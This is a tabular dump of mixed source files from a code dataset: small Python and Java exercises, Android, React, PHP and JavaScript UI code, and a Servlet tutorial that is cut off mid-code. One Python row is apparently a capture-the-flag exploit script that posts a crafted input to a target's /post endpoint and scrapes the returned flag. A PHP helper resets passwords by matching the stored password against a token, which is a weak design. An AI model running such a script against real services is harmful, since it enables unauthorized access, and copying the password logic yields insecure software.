language (stringclasses, 15 values) | src_encoding (stringclasses, 34 values) | length_bytes (int64, 6–7.85M) | score (float64, 1.5–5.69) | int_score (int64, 2–5) | detected_licenses (listlengths, 0–160) | license_type (stringclasses, 2 values) | text (stringlengths, 9–7.85M) |
---|---|---|---|---|---|---|---|
Python | UTF-8 | 208 | 3.0625 | 3 | [] | no_license |
# Character-count encoding: AAAABBBBCCDDD -> A4B4C2D3
line='ABBCDDD'
list1=[]
for i in line:
    x=line.count(i)            # total occurrences of this character in the string
    if i not in list1:
        list1.append(i)        # record the character once...
        list1.append(x)        # ...followed by its count
x=''
for i in list1:
    x+=str(i)
print(x)                       # 'ABBCDDD' -> A1B2C1D3
|
Java | UTF-8 | 370 | 2.859375 | 3 | [] | no_license |
class Solution {
    // Counts primes strictly less than n using simple trial division (O(n^2) in the worst case).
    public int countPrimes(int n) {
        if (n <= 1) {
            return 0;
        }
        int count = 0;
        for (int i = 2; i < n; i++) {
            boolean isPrime = true;
            for (int j = 2; j < i; j++) {
                if (i % j == 0) {   // found a divisor, so i is not prime
                    isPrime = false;
                    break;
                }
            }
            if (isPrime) {
                count++;
            }
        }
        return count;
    }
}
|
Python | UTF-8 | 964 | 2.71875 | 3 | [] | no_license |
#!/usr/bin/python2.7
#coding:utf-8
from sys import *
import requests
import re,string,random
# import hackhttp
host = argv[1]
port = int(argv[2])
timeout = 30
target = "http://%s:%s"%(host,port)
def randomString(stringLength=10):
    """Generate a random string of fixed length """
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))
def gen_str_atk(i):
    text = randomString(i)
    v = sum(map(ord, text))
    while v!=1024:
        text = randomString(i)
        v = sum(map(ord, text))
    return text, (v%2 == 0)
def exp():
    try:
        t= requests.post(target+'/post',data={'title':'a','author':'b','content':gen_str_atk(9)},timeout=timeout,headers={'User-Agent':'checker'}).text
        # print(t)
        rr = re.findall(r'flag{.*?}',t)
        print(rr)
        return rr
    except Exception as e:
        print('fail')
        exit(0)
if __name__ == '__main__':
    print(exp())
|
Java | UTF-8 | 2,359 | 2.5 | 2 | [] | no_license |
package com.okry.amt.ui.animhoriscroll;
import android.content.Context;
import android.view.View;
import java.util.List;
/**
* Created by marui on 13-11-26.
*/
public abstract class BaseHoriScrollItemAdapter<T> {
protected List<T> mList;
private HoriDataSetObserver mDataSetObserver;
public abstract View initView(LinearHoriScrollView parent, Context context, int position);
public int getCount() {
return mList==null ? 0:mList.size();
}
public T getItem(int position) {
if(mList != null && position >= 0 && position <= mList.size() - 1){
return mList.get(position);
}else{
return null;
}
}
public void setData(List<T> list){
mList = list;
}
public void remove(int position){
if(mList != null){
mList.remove(position);
if(mDataSetObserver != null){
mDataSetObserver.onRemove(position);
}
}
}
public void remove(T item) {
if (mList != null) {
int index = indexOf(item);
mList.remove(index);
if (mDataSetObserver != null) {
mDataSetObserver.onRemove(index);
}
}
}
private int indexOf(T item) {
for (int i = 0; i < mList.size(); i++) {
if (item.equals(mList.get(i))) return i;
}
return -1;
}
/**
* Register an observer that is called when changes happen to the data used by this adapter.
*
* @param observer the object that gets notified when the data set changes.
*/
public void registerDataSetObserver(HoriDataSetObserver observer){
mDataSetObserver = observer;
}
/**
* Unregister an observer that has previously been registered with this
* adapter via {@link #registerDataSetObserver}.
*
* @param observer the object to unregister.
*/
public void unregisterDataSetObserver(HoriDataSetObserver observer){
mDataSetObserver = null;
}
public void notifyDataSetChange() {
if (mDataSetObserver != null) {
mDataSetObserver.onInvalidated();
}
}
public interface HoriDataSetObserver {
public void onAdd(int position);
public void onRemove(int position);
public void onInvalidated();
}
}
|
JavaScript | UTF-8 | 3,313 | 2.546875 | 3 | [] | no_license |
/**
* @fileOverview Authentication (Signin and signup) action file
*
* @author Paradise Kelechi
*
* @requires NPM:axios
* @requires NPM:querystring
* @requires NPM:react-router
* @requires ../helpers/Constants
* @requires ../../tools/Routes
* @requires ../helpers/Alert
* @requires ../helpers/Authentication
*
*/
import axios from 'axios';
import querystring from 'querystring';
import {
browserHistory
} from 'react-router';
import {
SIGNIN_USER,
GOOGLE_SIGNIN_USER,
SIGNUP_USER,
LOGOUT_USER,
} from '../helpers/Constants';
import routes from '../../tools/Routes';
import {
authenticatePersist,
authenticateClear
} from '../helpers/Authentication';
import Alert from '../helpers/Alert';
export const signinUserAsync = data => ({
type: SIGNIN_USER,
payload: data
});
/**
*
* Signin user action
*
* @export signinUser
*
* @param {Object} user
*
* @returns {void}
*/
export const signinUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password
});
return (dispatch) => {
return axios.post(`${routes.signin}`, formdata)
.then((response) => {
const responseData = response.data;
authenticatePersist(responseData.token);
dispatch(signinUserAsync(responseData));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const signupUserAsync = user => ({
type: SIGNUP_USER,
payload: user
});
/**
* Signup user action
*
* @export signupUser
* @param {object} user
* @returns {void}
*/
export const signupUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password,
email: user.email
});
return (dispatch) => {
const request = axios
.post(`${routes.signup}`, formdata);
return request
.then((response) => {
authenticatePersist(response.data.token);
dispatch(signupUserAsync(response.data));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const googleSigninUserAsync = payload => ({
type: GOOGLE_SIGNIN_USER,
payload
});
/**
* Google signin user action
*
* @export googleSigninUser
*
* @param {Object} user
*
* @returns {void}
*/
export const googleSigninUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password,
email: user.email
});
return (dispatch) => {
const request = axios
.post(`${routes.googleSignin}`, formdata);
return request
.then((response) => {
authenticatePersist(response.data.token);
dispatch(googleSigninUserAsync(response.data));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const logoutUserAsync = user => ({
type: LOGOUT_USER,
user
});
/**
* Logout user action
*
* @export logoutUser
*
* @param {Object} user
*
* @returns {Object} logout dispatch
*/
export const logoutUser = (user) => {
return (dispatch) => {
authenticateClear();
dispatch(logoutUserAsync(user));
browserHistory.push('/signin');
};
};
|
Java | UTF-8 | 1,224 | 2.0625 | 2 | [] | no_license |
package com.junyou.bus.xingkongbaozang.configure.export;
import java.util.Map;
import com.junyou.configure.vo.GoodsConfigureVo;
/**
*
* @description Configuration table for the seven-day server-launch event (全民修仙)
*
* @author ZHONGDIAN
* @date 2013-12-12 11:43:48
*/
public class XkbzConfig {
private Integer id;
private Integer jifen; // concrete value of the consumption type
// Reward items used by the server itself (generic and class-specific rewards already merged)
private Map<String,GoodsConfigureVo> itemMap;
// Reward items sent to the client (generic and class-specific rewards already merged)
private String jianLiClient;
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public Integer getJifen() {
return jifen;
}
public void setJifen(Integer jifen) {
this.jifen = jifen;
}
public Map<String, GoodsConfigureVo> getItemMap() {
return itemMap;
}
public void setItemMap(Map<String, GoodsConfigureVo> itemMap) {
this.itemMap = itemMap;
}
public String getJianLiClient() {
return jianLiClient;
}
public void setJianLiClient(String jianLiClient) {
this.jianLiClient = jianLiClient;
}
public Object[] getVo(){
return new Object[]{
getId(),
getJifen(),
getJianLiClient()
};
}
}
|
JavaScript | UTF-8 | 18,732 | 3.453125 | 3 | ["MIT"] | permissive |
(function() {
function Vector(x, y, z) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
}
Vector.prototype = {
negative: function() {
return new Vector(-this.x, -this.y, -this.z);
},
add: function(v) {
if (v instanceof Vector) return new Vector(this.x + v.x, this.y + v.y, this.z + v.z);
else return new Vector(this.x + v, this.y + v, this.z + v);
},
subtract: function(v) {
if (v instanceof Vector) return new Vector(this.x - v.x, this.y - v.y, this.z - v.z);
else return new Vector(this.x - v, this.y - v, this.z - v);
},
multiply: function(v) {
if (v instanceof Vector) return new Vector(this.x * v.x, this.y * v.y, this.z * v.z);
else return new Vector(this.x * v, this.y * v, this.z * v);
},
divide: function(v) {
if (v instanceof Vector) return new Vector(this.x / v.x, this.y / v.y, this.z / v.z);
else return new Vector(this.x / v, this.y / v, this.z / v);
},
equals: function(v) {
return this.x == v.x && this.y == v.y && this.z == v.z;
},
dot: function(v) {
return this.x * v.x + this.y * v.y + this.z * v.z;
},
cross: function(v) {
return new Vector(
this.y * v.z - this.z * v.y,
this.z * v.x - this.x * v.z,
this.x * v.y - this.y * v.x
);
},
length: function() {
return Math.sqrt(this.dot(this));
},
unit: function() {
return this.divide(this.length());
},
min: function() {
return Math.min(Math.min(this.x, this.y), this.z);
},
max: function() {
return Math.max(Math.max(this.x, this.y), this.z);
},
toAngles: function() {
return {
theta: Math.atan2(this.z, this.x),
phi: Math.asin(this.y / this.length())
};
},
angleTo: function(a) {
return Math.acos(this.dot(a) / (this.length() * a.length()));
},
toArray: function(n) {
return [this.x, this.y, this.z].slice(0, n || 3);
},
clone: function() {
return new Vector(this.x, this.y, this.z);
},
init: function(x, y, z) {
this.x = x; this.y = y; this.z = z;
return this;
},
noZ: function() {
this.z = 0;
return this;
}
};
Vector.negative = function(a, b) {
b.x = -a.x; b.y = -a.y; b.z = -a.z;
return b;
};
Vector.add = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x + b.x; c.y = a.y + b.y; c.z = a.z + b.z; }
else { c.x = a.x + b; c.y = a.y + b; c.z = a.z + b; }
return c;
};
Vector.subtract = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x - b.x; c.y = a.y - b.y; c.z = a.z - b.z; }
else { c.x = a.x - b; c.y = a.y - b; c.z = a.z - b; }
return c;
};
Vector.multiply = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x * b.x; c.y = a.y * b.y; c.z = a.z * b.z; }
else { c.x = a.x * b; c.y = a.y * b; c.z = a.z * b; }
return c;
};
Vector.divide = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x / b.x; c.y = a.y / b.y; c.z = a.z / b.z; }
else { c.x = a.x / b; c.y = a.y / b; c.z = a.z / b; }
return c;
};
Vector.cross = function(a, b, c) {
c.x = a.y * b.z - a.z * b.y;
c.y = a.z * b.x - a.x * b.z;
c.z = a.x * b.y - a.y * b.x;
return c;
};
Vector.unit = function(a, b) {
var length = a.length();
b.x = a.x / length;
b.y = a.y / length;
b.z = a.z / length;
return b;
};
Vector.fromAngles = function(theta, phi) {
return new Vector(Math.cos(theta) * Math.cos(phi), Math.sin(phi), Math.sin(theta) * Math.cos(phi));
};
Vector.randomDirection = function() {
return Vector.fromAngles(Math.random() * Math.PI * 2, Math.asin(Math.random() * 2 - 1));
};
Vector.min = function(a, b) {
return new Vector(Math.min(a.x, b.x), Math.min(a.y, b.y), Math.min(a.z, b.z));
};
Vector.max = function(a, b) {
return new Vector(Math.max(a.x, b.x), Math.max(a.y, b.y), Math.max(a.z, b.z));
};
Vector.lerp = function(a, b, fraction) {
return b.subtract(a).multiply(fraction).add(a);
};
Vector.fromArray = function(a) {
return new Vector(a[0], a[1], a[2]);
};
Vector.angleBetween = function(a, b) {
return a.angleTo(b);
};
window.Vector = Vector;
})();
(function(){
'use strict';
// Configuration options
var opts = {
background: 'black',
numberOrbs: 150, // increase with screen size. 50 to 100 for my 2560 x 1400 monitor
maxVelocity: 2.5, // increase with screen size--dramatically affects line density. 2-3 for me
orbRadius: 1, // keep small unless you really want to see the dots bouncing. I like <= 1.
minProximity: 100, // controls how close dots have to come to each other before lines are traced
initialColorAngle: 7, // initialize the color angle, default = 7
colorFrequency: 0.3, // 0.3 default
colorAngleIncrement: 0.009, // 0.009 is slow and even
globalAlpha: 0.010, //controls alpha for lines, but not dots (despite the name)
manualWidth: false, // Default: false, change to your own custom width to override width = window.innerWidth. Yes i know I'm mixing types here, sue me.
manualHeight: false// Default: false, change to your own custom height to override height = window.innerHeight
};
// Canvas globals
var canvasTop, linecxt, canvasBottom, cxt, width, height, animationFrame;
// Global objects
var orbs;
// Orb object - these are the guys that bounce around the screen.
// We will draw lines between these dots, but that behavior is found
// in the Orbs container object
var Orb = (function() {
// Constructor
function Orb(radius, color) {
var posX = randBetween(0, width);
var posY = randBetween(0, height);
this.position = new Vector(posX, posY);
var velS = randBetween(0, opts.maxVelocity); // Velocity scalar
this.velocity = Vector.randomDirection().multiply(velS).noZ();
this.radius = radius;
this.color = color;
}
// Orb methods
Orb.prototype = {
update: function() {
// position = position + velocity
this.position = this.position.add(this.velocity);
// bounce if the dot reaches the edge of the container.
// this can be EXTREMELY buggy with large dot radiuses, but it works for this
// drawing.
if (this.position.x + this.radius >= width || this.position.x - this.radius <= 0) {
this.velocity.x = this.velocity.x * -1;
}
if (this.position.y + this.radius >= height || this.position.y - this.radius <= 0) {
this.velocity.y = this.velocity.y * -1;
}
},
display: function() {
cxt.beginPath();
cxt.fillStyle = this.color;
cxt.ellipse(this.position.x, this.position.y, this.radius, this.radius, 0, 0, 2*Math.PI, false);
cxt.fill();
cxt.closePath();
},
run: function() {
this.update();
this.display();
}
};
return Orb;
})();
// Orbs object - this is a container that manages all of the individual Orb objects.
// In addition, this object holds the color phasing and line-drawing functionality,
// since it already iterates over all the orbs once per frame anyway.
var Orbs = (function() {
// Constructor
function Orbs(numberOrbs, radius, initialColorAngle, globalAlpha, colorAngleIncrement, colorFrequency) {
this.orbs = [];
this.colorAngle = initialColorAngle;
this.colorAngleIncrement = colorAngleIncrement;
this.globalAlpha = globalAlpha;
this.colorFrequency = colorFrequency;
this.color = null;
for (var i = 0; i < numberOrbs; i++) {
this.orbs.push(new Orb(radius, this.color));
}
}
Orbs.prototype = {
run: function() {
this.phaseColor();
for (var i = 0; i < this.orbs.length; i++) {
for (var j = i + 1; j < this.orbs.length; j++) {
// we only want to compare this orb to orbs which are further along in the array,
// since any that came before will have already been compared to this orb.
this.compare(this.orbs[i], this.orbs[j]);
}
this.orbs[i].color = this.color;
this.orbs[i].run();
}
},
compare: function(orbA, orbB) {
// Get the distance between the two orbs.
var distance = Math.abs(orbA.position.subtract(orbB.position).length());
if (distance <= opts.minProximity) {
// the important thing to note here is that we're drawing this onto '#canvas-top'
// since we want to preserve everything drawn to that layer.
linecxt.beginPath();
linecxt.strokeStyle = this.color;
linecxt.globalAlpha = this.globalAlpha;
linecxt.moveTo(orbA.position.x, orbA.position.y);
linecxt.lineTo(orbB.position.x, orbB.position.y);
linecxt.stroke();
linecxt.closePath();
}
},
phaseColor: function() {
// color component = sin(freq * angle + phaseOffset) => (between -1 and 1) * 127 + 128
var r = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*0/3) * 127 + 128);
var g = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*2/3) * 127 + 128);
var b = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*4/3) * 127 + 128);
this.color = 'rgba(' + r + ', ' + g + ', ' + b + ', 1)';
this.colorAngle += this.colorAngleIncrement;
}
};
return Orbs;
})();
// This function is called once and only once to kick off the code.
// It links DOM objects like the canvas to the respective global variable.
function initialize() {
canvasTop = document.querySelector('#canvas-top'); // this canvas is for the lines between dots
canvasBottom = document.querySelector('#canvas-bottom'); // this canvas is for the dots that bounce around
linecxt = canvasTop.getContext('2d');
cxt = canvasBottom.getContext('2d');
window.addEventListener('resize', resize, false);
resize();
}
// This function is called after initialization and window resize.
function resize() {
width = opts.manualWidth ? opts.manualWidth : window.innerWidth;
height = opts.manualHeight ? opts.manualHeight : window.innerHeight;
setup();
}
// after window resize we need to
function setup() {
canvasTop.width = width;
canvasTop.height = height;
canvasBottom.width = width;
canvasBottom.height = height;
//fillBackground(linecxt); // Enable this line if you want to save an image of the drawing.
fillBackground(cxt);
orbs = new Orbs(opts.numberOrbs, opts.orbRadius, opts.initialColorAngle, opts.globalAlpha, opts.colorAngleIncrement, opts.colorFrequency);
// If we hit this line, it was either via initialization procedures (which means animationFrame is undefined)
// or through window resize, in which case we need to cancel the old draw loop and make a new one.
if (animationFrame !== undefined) { cancelAnimationFrame(animationFrame); }
draw();
}
// Notice that we only fillBackground on one of the two canvases. This is because we want to animate
// the dot layer (we don't want to leave trails left by the dots), but preserve the line layer.
function draw() {
fillBackground(cxt);
orbs.run();
// Update the global animationFrame variable -- this enables to cancel the redraw loop on resize
animationFrame = requestAnimationFrame(draw);
}
// generic background fill function
function fillBackground(context) {
context.fillStyle = opts.background;
context.fillRect(0, 0, width, height);
}
// get random float between two numbers, inclusive
function randBetween(low, high) {
return Math.random() * (high - low) + low;
}
// get random INT between two numbers, inclusive
function randIntBetween(low, high) {
return Math.floor(Math.random() * (high - low + 1) + low);
}
// Start the code already, dammit!
initialize();
})();
var container = $(".nav-container"),
target = $(".hero-banner").outerHeight() - 60;
$(window).scroll(function() {
if ($(window).scrollTop() >= target) {
container.addClass("scroll-nav");
} else {
container.removeClass("scroll-nav");
}
}); // End scroll
// Typing Stuff
//set animation timing
var animationDelay = 2500,
//loading bar effect
barAnimationDelay = 3800,
barWaiting = barAnimationDelay - 3000, //3000 is the duration of the transition on the loading bar - set in the scss/css file
//letters effect
lettersDelay = 50,
//type effect
typeLettersDelay = 150,
selectionDuration = 500,
typeAnimationDelay = selectionDuration + 800,
//clip effect
revealDuration = 600,
revealAnimationDelay = 1500;
initHeadline();
function initHeadline() {
//insert <i> element for each letter of a changing word
singleLetters($('.cd-headline.letters').find('b'));
//initialise headline animation
animateHeadline($('.cd-headline'));
}
function singleLetters(words) {
words.each(function() {
var word = $(this),
letters = word.text().split(''),
selected = word.hasClass('is-visible');
for (i in letters) {
if (word.parents('.rotate-2').length > 0) letters[i] = '<em>' + letters[i] + '</em>';
letters[i] = (selected) ? '<i class="in">' + letters[i] + '</i>' : '<i>' + letters[i] + '</i>';
}
var newLetters = letters.join('');
word.html(newLetters).css('opacity', 1);
});
}
function animateHeadline($headlines) {
var duration = animationDelay;
$headlines.each(function() {
var headline = $(this);
if (headline.hasClass('loading-bar')) {
duration = barAnimationDelay;
setTimeout(function() {
headline.find('.cd-words-wrapper').addClass('is-loading')
}, barWaiting);
} else if (headline.hasClass('clip')) {
var spanWrapper = headline.find('.cd-words-wrapper'),
newWidth = spanWrapper.width() + 10
spanWrapper.css('width', newWidth);
} else if (!headline.hasClass('type')) {
//assign to .cd-words-wrapper the width of its longest word
var words = headline.find('.cd-words-wrapper b'),
width = 0;
words.each(function() {
var wordWidth = $(this).width();
if (wordWidth > width) width = wordWidth;
});
headline.find('.cd-words-wrapper').css('width', width);
};
//trigger animation
setTimeout(function() {
hideWord(headline.find('.is-visible').eq(0))
}, duration);
});
}
function hideWord(word) {
var nextWord = takeNext(word);
if (word.parents('.cd-headline').hasClass('type')) {
var parentSpan = word.parent('.cd-words-wrapper');
parentSpan.addClass('selected').removeClass('waiting');
setTimeout(function() {
parentSpan.removeClass('selected');
word.removeClass('is-visible').addClass('is-hidden').children('i').removeClass('in').addClass('out');
}, selectionDuration);
setTimeout(function() {
showWord(nextWord, typeLettersDelay)
}, typeAnimationDelay);
} else if (word.parents('.cd-headline').hasClass('letters')) {
var bool = (word.children('i').length >= nextWord.children('i').length) ? true : false;
hideLetter(word.find('i').eq(0), word, bool, lettersDelay);
showLetter(nextWord.find('i').eq(0), nextWord, bool, lettersDelay);
} else if (word.parents('.cd-headline').hasClass('clip')) {
word.parents('.cd-words-wrapper').animate({
width: '2px'
}, revealDuration, function() {
switchWord(word, nextWord);
showWord(nextWord);
});
} else if (word.parents('.cd-headline').hasClass('loading-bar')) {
word.parents('.cd-words-wrapper').removeClass('is-loading');
switchWord(word, nextWord);
setTimeout(function() {
hideWord(nextWord)
}, barAnimationDelay);
setTimeout(function() {
word.parents('.cd-words-wrapper').addClass('is-loading')
}, barWaiting);
} else {
switchWord(word, nextWord);
setTimeout(function() {
hideWord(nextWord)
}, animationDelay);
}
}
function showWord(word, $duration) {
if (word.parents('.cd-headline').hasClass('type')) {
showLetter(word.find('i').eq(0), word, false, $duration);
word.addClass('is-visible').removeClass('is-hidden');
} else if (word.parents('.cd-headline').hasClass('clip')) {
word.parents('.cd-words-wrapper').animate({
'width': word.width() + 10
}, revealDuration, function() {
setTimeout(function() {
hideWord(word)
}, revealAnimationDelay);
});
}
}
function hideLetter($letter, word, $bool, $duration) {
$letter.removeClass('in').addClass('out');
if (!$letter.is(':last-child')) {
setTimeout(function() {
hideLetter($letter.next(), word, $bool, $duration);
}, $duration);
} else if ($bool) {
setTimeout(function() {
hideWord(takeNext(word))
}, animationDelay);
}
if ($letter.is(':last-child') && $('html').hasClass('no-csstransitions')) {
var nextWord = takeNext(word);
switchWord(word, nextWord);
}
}
function showLetter($letter, word, $bool, $duration) {
$letter.addClass('in').removeClass('out');
if (!$letter.is(':last-child')) {
setTimeout(function() {
showLetter($letter.next(), word, $bool, $duration);
}, $duration);
} else {
if (word.parents('.cd-headline').hasClass('type')) {
setTimeout(function() {
word.parents('.cd-words-wrapper').addClass('waiting');
}, 200);
}
if (!$bool) {
setTimeout(function() {
hideWord(word)
}, animationDelay)
}
}
}
function takeNext(word) {
return (!word.is(':last-child')) ? word.next() : word.parent().children().eq(0);
}
function takePrev(word) {
return (!word.is(':first-child')) ? word.prev() : word.parent().children().last();
}
function switchWord($oldWord, $newWord) {
$oldWord.removeClass('is-visible').addClass('is-hidden');
$newWord.removeClass('is-hidden').addClass('is-visible');
}
$(document).on("click", ".call-button", function(e) {
e.preventDefault();
// Make something fancy happen
$('.call-form').toggle();
});
// End ready
var main = document.getElementById('main');
function checkNav() {
if (main.classList.contains('active')) {
closeNav();
}
else {
openNav();
}
}
function openNav() {
main.classList.add('active');
}
function closeNav() {
main.classList.remove('active');
}
window.onload = function(){
$(".containerquay").fadeOut('fast').delay(2000).queue(function() {$(this).remove();});
};
|
PHP | UTF-8 | 2,520 | 3.078125 | 3 | ["MIT"] | permissive |
<?php
namespace AsyncAws\CloudWatch\ValueObject;
use AsyncAws\Core\Exception\InvalidArgument;
/**
* Represents a set of statistics that describes a specific metric.
*/
final class StatisticSet
{
/**
* The number of samples used for the statistic set.
*
* @var float
*/
private $sampleCount;
/**
* The sum of values for the sample set.
*
* @var float
*/
private $sum;
/**
* The minimum value of the sample set.
*
* @var float
*/
private $minimum;
/**
* The maximum value of the sample set.
*
* @var float
*/
private $maximum;
/**
* @param array{
* SampleCount: float,
* Sum: float,
* Minimum: float,
* Maximum: float,
* } $input
*/
public function __construct(array $input)
{
$this->sampleCount = $input['SampleCount'] ?? $this->throwException(new InvalidArgument('Missing required field "SampleCount".'));
$this->sum = $input['Sum'] ?? $this->throwException(new InvalidArgument('Missing required field "Sum".'));
$this->minimum = $input['Minimum'] ?? $this->throwException(new InvalidArgument('Missing required field "Minimum".'));
$this->maximum = $input['Maximum'] ?? $this->throwException(new InvalidArgument('Missing required field "Maximum".'));
}
/**
* @param array{
* SampleCount: float,
* Sum: float,
* Minimum: float,
* Maximum: float,
* }|StatisticSet $input
*/
public static function create($input): self
{
return $input instanceof self ? $input : new self($input);
}
public function getMaximum(): float
{
return $this->maximum;
}
public function getMinimum(): float
{
return $this->minimum;
}
public function getSampleCount(): float
{
return $this->sampleCount;
}
public function getSum(): float
{
return $this->sum;
}
/**
* @internal
*/
public function requestBody(): array
{
$payload = [];
$v = $this->sampleCount;
$payload['SampleCount'] = $v;
$v = $this->sum;
$payload['Sum'] = $v;
$v = $this->minimum;
$payload['Minimum'] = $v;
$v = $this->maximum;
$payload['Maximum'] = $v;
return $payload;
}
/**
* @return never
*/
private function throwException(\Throwable $exception)
{
throw $exception;
}
}
|
PHP | UTF-8 | 510 | 2.65625 | 3 | [] | no_license |
<?php
function update_new_password($token, $password){
try{
global $bdd;
$query = $bdd->prepare("UPDATE ifup_user SET ifup_user_password=:ifup_user_password WHERE ifup_user_password=:token");
$query->bindParam(':ifup_user_password',$password, PDO::PARAM_STR);
$query->bindParam(':token',$token, PDO::PARAM_STR);
$query->execute();
return $query;
}
catch(Exception $e){
return false;
}
}
|
Markdown | UTF-8 | 8,821 | 2.578125 | 3 | [] | no_license |
[toc]
## **What is a Servlet?**
A Java Servlet is a program that runs on a web server or application server and acts as a middle layer between requests coming from a web browser or other HTTP client and the databases or applications on the HTTP server.
==A Servlet is a program written in Java, based on the HTTP protocol, that runs on the server side (for example in Tomcat); it is a Java class written according to the Servlet specification. Servlets handle the request/response interaction between client and server.==
With Servlets you can collect user input from web forms, present records from a database or another source, and create web pages dynamically.
A Java Servlet can usually achieve the same effect as a program implemented with CGI (Common Gateway Interface), but compared with CGI, Servlets have the following advantages:
- Noticeably better performance.
- A Servlet executes within the web server's address space, so there is no need to create a separate process to handle each client request.
- Servlets are platform independent because they are written in Java.
- The Java security manager on the server enforces a set of restrictions that protect the resources of the server machine, so Servlets are trusted.
- The full functionality of the Java class library is available to a Servlet. It can interact with applets, databases, or other software via sockets and RMI.
## Servlet Request-Handling Flow

- The server creates the Servlet object, runs its init method, and calls its service method.
- The container creates two objects: an HttpServletRequest and an HttpServletResponse.
- An HTTP GET request is dispatched to doGet, a POST request to doPost.
- The Servlet handles each request on its own thread.
> Flow
1. The browser sends a GET request to the server (requesting ServletA).
2. The container logic on the server receives the URL, determines that it is a Servlet request, and creates two objects: a request object (HttpServletRequest) and a response object (HttpServletResponse).
3. The container logic locates the target Servlet for that URL (ServletA in this example) and creates a thread A.
4. The container logic hands the newly created request and response objects to thread A.
5. The container logic calls the Servlet's service() method.
6. service() calls doGet() or doPost() according to the request type (a GET request here, so doGet()).
7. When doGet() finishes, it returns the result to the container logic.
8. Thread A is destroyed or returned to the thread pool.
## Differences Between forward and redirect
- forward is a server-side dispatch: the server accesses the target URL directly, the client never knows about it, the browser does not navigate to a new address, and a single request object is used throughout the dispatch.
- redirect is a full jump: the server tells the browser to navigate to another address (for example baidu.com becomes www.baidu.com), which costs one extra network request. The sketch below contrasts the two.
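As a minimal, hedged sketch (the servlet name, JSP path, and `mode` parameter are made up for illustration), the two mechanisms look like this in code:
```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical servlet used only to contrast forward with redirect.
public class DispatchDemoServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        if ("forward".equals(request.getParameter("mode"))) {
            // forward: handled entirely inside the server with the same
            // request/response pair; the browser's address bar does not change.
            request.getRequestDispatcher("/result.jsp").forward(request, response);
        } else {
            // redirect: the server answers with a 302 and the browser issues a
            // second request to the new URL, so the address bar changes.
            response.sendRedirect("https://www.baidu.com");
        }
    }
}
```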
## **The javax.servlet Package Contains 7 Interfaces, 3 Classes, and 2 Exception Classes**
Interfaces:
```
RequestDispatcher, Servlet, ServletConfig,
ServletContext, ServletRequest, ServletResponse,
SingleThreadModel
```
Classes:
```
GenericServlet,
ServletInputStream,
ServletOutputStream
```
Exception classes:
```
ServletException
UnavailableException
```
### **1. UML**
The figure below shows the UML relationships of the Servlet API.

From the diagram you can see:
```
getParameter() retrieves the value of a parameter passed via POST/GET;
getInitParameter() retrieves the Context initialization parameters configured in Tomcat's server.xml;
getAttribute() retrieves a value stored in the object container; getRequestDispatcher() performs request forwarding.
```
1. The abstract class HttpServlet extends the abstract class GenericServlet; its two key methods are doGet() and doPost().
2. GenericServlet implements the interfaces Servlet, ServletConfig, and Serializable.
3. MyServlet (a user-defined Servlet class) extends HttpServlet and overrides its doGet() and doPost() methods.
Note: any user-defined Servlet only needs to override doPost() and doGet() of the abstract class HttpServlet, as MyServlet does in the figure above.
### **2. How a Servlet Executes Inside the Container**
A Servlet can only run inside a container, and there are many kinds of Servlet containers, such as Tomcat and WebLogic.
Analysis:
1. The browser sends a GET request to the server (requesting ServletA).
2. The container logic on the server receives the URL, determines that it is a Servlet request, and creates two objects: a request object (HttpServletRequest) and a response object (HttpServletResponse).
3. The container logic locates the target Servlet for that URL (ServletA in this example) and creates a thread A.
4. The container logic hands the newly created request and response objects to thread A.
5. The container logic calls the Servlet's service() method.
6. service() calls doGet() or doPost() according to the request type (a GET request here, so doGet()).
7. When doGet() finishes, it returns the result to the container logic.
8. Thread A is destroyed or returned to the thread pool.
Note:
1. In principle there is only one instance of each Servlet in the container.
2. Each request corresponds to one thread.
3. Multiple threads may operate on the same Servlet instance (this is the root cause of Servlet thread-safety problems); see the sketch after this list.
4. Once a thread has finished its task, it is destroyed or placed back in the thread pool to be reclaimed.
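A minimal sketch (the counter field and servlet name are invented for illustration) of why shared instance state is unsafe when many request threads pass through the single Servlet instance:
```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical servlet: because the container keeps one instance, 'count' is
// shared by every request thread, and the unsynchronized increment can lose updates.
public class UnsafeCounterServlet extends HttpServlet {
    private int count = 0; // shared mutable state: NOT thread-safe

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        count++; // read-modify-write race under concurrent requests
        response.getWriter().println("visits: " + count);
    }
}
```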
### **3. The Roles a Servlet Plays in a Java Web Application**
**The following methods can be used in a Servlet to read HTTP headers and request data.**
They are available on the *HttpServletRequest* object, and a usage sketch follows the list below:
```
1) Cookie[] getCookies()
// Returns an array containing all the Cookie objects the client sent with this request.
2) Object getAttribute(String name)
// Returns the value of the named attribute as an Object, or null if no attribute with the given name exists.
3) String getHeader(String name)
// Returns the value of the specified request header as a String. A Cookie is also carried in a header.
4) String getParameter(String name)
// Returns the value of a request parameter as a String, or null if the parameter does not exist.
```
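A minimal sketch (the header, parameter, and attribute names are illustrative) showing these accessors inside doGet:
```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.Cookie;
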